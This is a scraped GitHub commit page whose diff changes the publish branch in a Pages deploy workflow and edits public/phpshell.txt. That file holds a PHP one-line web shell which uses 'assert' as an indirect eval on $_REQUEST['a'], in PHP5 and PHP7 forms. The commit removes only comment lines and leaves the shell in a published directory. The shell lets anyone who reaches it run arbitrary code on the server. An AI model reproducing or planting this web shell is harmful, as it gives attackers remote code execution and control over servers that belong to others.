We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 136056a commit 98d9f7fCopy full SHA for 98d9f7f
.github/workflows/deploy.yml
@@ -17,4 +17,4 @@ jobs:
17
with:
18
github_token: ${{ secrets.GITHUB_TOKEN }}
19
publish_dir: ./public # 替换为 master 分支中你要关联的目录
20
- publish_branch: gh-pages
+ publish_branch: gh-page
public/phpshell.txt
@@ -1,9 +1,9 @@
1
-//php5
+
2
<?php
3
$a='assert';
4
[""=>$a($_REQUEST['a'])];
5
?>
6
-//php7
7
8
'assert'($_REQUEST['a']));
9
0 commit comments